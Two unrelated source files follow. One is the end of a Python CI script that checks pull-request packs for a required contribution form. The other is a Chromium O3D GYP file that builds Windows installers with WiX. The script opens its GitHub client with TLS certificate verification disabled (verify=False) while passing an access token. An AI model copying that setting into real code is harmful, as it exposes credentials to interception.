repo_pack_metadata_path: str = os.path.join(CONTENT_ROOT_PATH, PACKS, pack_name, METADATA)
print(f'{pack_name} pack {METADATA} file is at path: {repo_pack_metadata_path}')
repo_pack_metadata: dict = load_json(repo_pack_metadata_path)
return repo_pack_metadata.get(SUPPORT)
def arguments_handler():
""" Validates and parses script arguments.
Returns:
Namespace: Parsed arguments object.
"""
parser = argparse.ArgumentParser(description='Check if the contribution form needs to be filled.')
parser.add_argument('-p', '--pr_number', help='The PR number to check if the contribution form needs to be filled.')
parser.add_argument('-g', '--github_token', help='The GitHub token to authenticate the GitHub client.')
return parser.parse_args()
def main():
options = arguments_handler()
pr_number = options.pr_number
github_token = options.github_token
org_name: str = 'demisto'
repo_name: str = 'content'
exit_status = 0
packs_without_metadata_or_support = set()
not_filled_packs = set()
github_client: Github = Github(github_token, verify=False)
content_repo: Repository = github_client.get_repo(f'{org_name}/{repo_name}')
pr: PullRequest = content_repo.get_pull(int(pr_number))
pr_files = pr.get_files()
for pack_name in get_pack_names_from_pr(pr_files):
if pr_metadata_filename := get_metadata_filename_from_pr(pr_files, pack_name):
support_type = get_pack_support_type_from_pr_metadata_file(pr_metadata_filename, pr)
else:
support_type = get_pack_support_type_from_repo_metadata_file(pack_name)
if not support_type:
packs_without_metadata_or_support.add(pack_name)
exit_status = 1
elif support_type == XSOAR_SUPPORT:
print(f'\n{pack_name} pack is XSOAR supported. Contribution form should not be filled for XSOAR supported '
f'contributions.')
else:
not_filled_packs.add(pack_name)
print(f'{pack_name} pack is {support_type} supported.')
exit_status = 1
if packs_without_metadata_or_support:
print(f'ERROR: {METADATA} file / pack support is missing for the following packs: '
f'{packs_without_metadata_or_support}')
if not_filled_packs:
print(f'\nERROR: Contribution form was not filled for PR: {pr_number}.\nMake sure to register your contribution'
f' by filling the contribution registration form in - https://forms.gle/XDfxU4E61ZwEESSMA')
sys.exit(exit_status)
if __name__ == "__main__":
main()
|
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
'wixdir': 'third_party\\wix_2_0_4221\\files',
'dx_redist_path': '../../../o3d-internal/third_party/dx_nov_2007_redist',
'dx_redist_exists': '<!(python ../../build/file_exists.py ../../../o3d-internal/third_party/dx_nov_2007_redist/d3dx9_36.dll)',
'guidgen': '..\\..\\nbguidgen\\win\\nbguidgen.exe',
'nppversion': '<!(python ../../plugin/version_info.py --commaversion)',
'dotnppversion': '<!(python ../../plugin/version_info.py --version)',
# Unique guid for o3d namespace
'o3d_namespace_guid': 'B445DBAE-F5F9-435A-9A9B-088261CDF00A',
# Changing the following values would break upgrade paths, so we
# hard-code the values instead of generating them.
'bad_old_o3d_upgrade_code': 'dc819ed6-4155-3cff-b580-45626aed5848',
'o3d_extras_google_update_guid': '{34B2805D-C72C-4f81-AED5-5A22D1E092F1}',
'o3d_extras_upgrade_code': 'c271f2f0-c7ad-3bc9-8216-211436aa2244',
'o3d_npp_google_update_guid': '{70308795-045C-42da-8F4E-D452381A7459}',
'o3d_npp_upgrade_code': '0f098121-2876-3c23-bd4c-501220ecbb42',
# We don't actually want the extras version to update by itself;
# it should change only when we actually add something to the
# installer or change the d3dx9 version. This version is
# therefore independent of the o3d plugin and sdk versions.
'extrasversion': '0,1,1,0',
'dotextrasversion': '0.1.1.0',
# Registry paths for Google Update
'google_update_reg_path': 'Software\\Google\\Update\\Clients\\',
'google_update_state_reg_path': 'Software\\Google\\Update\\ClientState\\',
},
'includes': [
'../../build/common.gypi',
],
'targets': [
{
'target_name': 'cactions',
'type': 'shared_library',
'sources': [
'custom_actions.cc',
],
'dependencies': [
'../../../base/base.gyp:base',
'../../build/libs.gyp:cg_libs',
'../../build/libs.gyp:gl_libs',
'../../plugin/plugin.gyp:o3dPluginLogging',
'../../statsreport/statsreport.gyp:o3dStatsReport',
],
'include_dirs': [
'../..',
'../../..',
'../../<(glewdir)/include',
'../../<(cgdir)/include',
'<(INTERMEDIATE_DIR)',
'$(DXSDK_DIR)/Include',
],
'defines': [
'NOMINMAX',
'WIN32',
'WIN32_LEAN_AND_MEAN',
'_ATL_SECURE_NO_WARNINGS',
'_CRT_SECURE_NO_DEPRECATE',
'_UNICODE', # turn on unicode
'_WIN32_WINNT=0x0600',
'_WINDOWS',
],
'libraries': [
'-ladvapi32.lib',
'"$(DXSDK_DIR)/Lib/x86/dxguid.lib"',
'-lmsi.lib',
'-lole32.lib',
'-loleaut32.lib',
'-lshell32.lib',
'-lshlwapi.lib',
'-luser32.lib',
],
# Disable the #pragma deprecated warning because
# ATL seems to use deprecated CRT libs.
'msvs_disabled_warnings': [4995],
'msvs_configuration_attributes': {
'UseOfATL': '1', # 1 = static link to ATL, 2 = dynamic link
},
},
{
'target_name': 'installer',
'type': 'none',
'variables': {
'candle_exe': '../../../<(wixdir)/candle.exe',
'light_exe': '../../../<(wixdir)/light.exe',
'custom_actions_path': '<(PRODUCT_DIR)/cactions.dll',
'd3dx_guid': '<!(<(guidgen) <(o3d_namespace_guid) d3dx-<(nppversion))',
'dbl_path': '../../installer/win/driver_blacklist.txt',
'dx_redist_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'dx_redist-<(nppversion))',
'get_extras_path': '<(PRODUCT_DIR)/getextras.exe',
'ieplugin_path': '<(PRODUCT_DIR)/o3d_host.dll',
'include_software_renderer':
'<!(python ../../build/file_exists.py '
'../../../<(swiftshaderdir)/swiftshader_d3d9.dll)',
'npplugin_path': '<(PRODUCT_DIR)/npo3dautoplugin.dll',
'o3d_driver_blacklist_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_driver_blacklist-<(nppversion))',
'o3d_get_extras_guid':
'<!(<(guidgen) <(o3d_namespace_guid) extras_installer-)',
'o3d_iep_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_ieplugin_component-<(nppversion))',
'o3d_npp_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_npplugin_component-<(nppversion))',
'o3d_npp_google_update_reg_component_guid':
'<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_user_google_update_reg_component-<(nppversion))',
'o3d_npp_package_guid': '<!(<(guidgen) <(o3d_namespace_guid) o3d_package-<(nppversion))',
'o3d_npp_product_guid': '<!(<(guidgen) <(o3d_namespace_guid) o3d_product-<(nppversion))',
'o3d_npp_reg_key':
'<(google_update_reg_path)<(o3d_npp_google_update_guid)',
'o3d_npp_state_reg_key':
'<(google_update_state_reg_path)<(o3d_npp_google_update_guid)',
'o3d_reporter_guid':
'<!(<(guidgen) <(o3d_namespace_guid) o3d_reporter-<(nppversion))',
'o3d_software_renderer_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_software_renderer-<(nppversion))',
'rep_path': '<(PRODUCT_DIR)/reporter.exe',
'software_renderer_path':
'../../../<(swiftshaderdir)/swiftshader_d3d9.dll',
},
'dependencies': [
'../../converter/converter.gyp:o3dConverter',
'../../breakpad/breakpad.gyp:reporter',
'../../google_update/google_update.gyp:getextras',
'../../documentation/documentation.gyp:*',
'../../plugin/plugin.gyp:npo3dautoplugin',
'../../plugin/plugin.gyp:o3d_host',
'../../samples/samples.gyp:samples',
'../../build/libs.gyp:cg_libs',
'../../build/libs.gyp:gl_libs',
'cactions',
],
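      # The WiX toolset builds the MSI in two passes: candle compiles each .wxs
      # source into a .wixobj, then light links the .wixobj into the final .msi
      # (see the two rules below).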
'rules': [
{
'rule_name': 'candle',
'extension': 'wxs',
'process_outputs_as_sources': 1,
'inputs': [
'<(candle_exe)',
'../../installer/win/docs.url',
'<(PRODUCT_DIR)/cactions.dll',
'<(PRODUCT_DIR)/cg.dll',
'<(PRODUCT_DIR)/cgGL.dll',
'<(PRODUCT_DIR)/cgc.exe',
'<(PRODUCT_DIR)/o3dConditioner.exe',
'<(dbl_path)',
'<(get_extras_path)',
'<(ieplugin_path)',
'<(npplugin_path)',
'<(rep_path)',
],
'outputs': [
'<(RULE_INPUT_ROOT).wixobj',
],
'action': [
'<(candle_exe)',
'-nologo',
'-dCustomActionsPath=<(custom_actions_path)',
'-dD3DXGuid=<(d3dx_guid)',
'-dDBLGuid=<(o3d_driver_blacklist_guid)',
'-dDBLPath=<(dbl_path)',
'-dDeprecatedUpgradeCode=<(bad_old_o3d_upgrade_code)',
'-dGetExtrasGuid=<(o3d_get_extras_guid)',
'-dGetExtrasPath=<(get_extras_path)',
'-dIEPluginPath=<(ieplugin_path)',
'-dIepComponentGuid=<(o3d_iep_component_guid)',
            '-dIncludeSoftwareRenderer=<(include_software_renderer)',
'-dNPPluginPath=<(npplugin_path)',
'-dNppComponentGuid=<(o3d_npp_component_guid)',
'-dNppGoogleUpdateRegGuid=<(o3d_npp_google_update_reg_component_guid)',
'-dNppGoogleUpdateRegKey=<(o3d_npp_reg_key)',
'-dNppGoogleUpdateStateRegKey=<(o3d_npp_state_reg_key)',
'-dNppPackageGuid=<(o3d_npp_package_guid)',
'-dNppProductGuid=<(o3d_npp_product_guid)',
'-dNppUpgradeCode=<(o3d_npp_upgrade_code)',
'-dNppVersion=<(dotnppversion)',
'-dRepGuid=<(o3d_reporter_guid)',
'-dRepPath=<(rep_path)',
'-dSoftwareRendererGuid=<(o3d_software_renderer_guid)',
'-dSoftwareRendererPath=<(software_renderer_path)',
'-o',
'<(RULE_INPUT_ROOT).wixobj',
'<(RULE_INPUT_PATH)',
],
'message': 'Generating installer from <(RULE_INPUT_PATH)',
},
{
'rule_name': 'light',
'extension': 'wixobj',
'process_outputs_as_sources': 1,
'inputs': [
'<(light_exe)',
],
'outputs': [
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
],
'action': [
'<(light_exe)',
'-nologo',
'-out',
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
'<(RULE_INPUT_PATH)',
],
'message': 'Linking installer from <(RULE_INPUT_PATH)',
},
],
'sources': [
'o3d.wxs',
],
},
],
'conditions': [
['"<(dx_redist_exists)" == "True"',
{
'targets': [
{
'target_name': 'extras_installer',
'type': 'none',
'variables': {
'candle_exe': '../../../<(wixdir)/candle.exe',
'light_exe': '../../../<(wixdir)/light.exe',
'o3d_extras_d3dx_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_extras_d3dx_component-<(nppversion))',
'o3d_extras_package_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_extras_package-<(extrasversion))',
'o3d_extras_product_guid': '<!(<(guidgen) <(o3d_namespace_guid) '
'o3d_extras_product-<(extrasversion))',
'o3d_extras_reg_key':
'<(google_update_reg_path)<(o3d_extras_google_update_guid)',
},
'rules': [
{
'rule_name': 'candle',
'extension': 'wxs',
'process_outputs_as_sources': 1,
'inputs': [
'<(candle_exe)',
],
'outputs': [
'<(RULE_INPUT_ROOT).wixobj',
],
'action': [
'<(candle_exe)',
'-nologo',
'-dDxRedistPath=<(dx_redist_path)',
'-dExtrasD3DXComponentGuid=<(o3d_extras_d3dx_component_guid)',
'-dExtrasGoogleUpdateRegGuid=<(o3d_extras_google_update_guid)',
'-dExtrasGoogleUpdateRegKey=<(o3d_extras_reg_key)',
'-dExtrasPackageGuid=<(o3d_extras_package_guid)',
'-dExtrasProductGuid=<(o3d_extras_product_guid)',
'-dExtrasUpgradeCode=<(o3d_extras_upgrade_code)',
'-dExtrasVersion=<(dotextrasversion)',
'-o',
'<(RULE_INPUT_ROOT).wixobj',
'<(RULE_INPUT_PATH)',
],
'message': 'Generating extras installer from <(RULE_INPUT_PATH)',
},
{
'rule_name': 'light',
'extension': 'wixobj',
'process_outputs_as_sources': 1,
'inputs': [
'<(light_exe)',
],
'outputs': [
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
],
'action': [
'<(light_exe)',
'-nologo',
'-out',
'<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi',
'<(RULE_INPUT_PATH)',
],
'message': 'Linking extras installer from <(RULE_INPUT_PATH)',
},
],
'sources': [
'o3dextras.wxs',
],
},
],
},
{
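        # Fallback branch: the DirectX redistributable is not present in the
        # checkout, so extras_installer is defined as an empty, do-nothing target.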
'targets': [
{
'target_name': 'extras_installer',
'type': 'none',
},
],
},
],
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|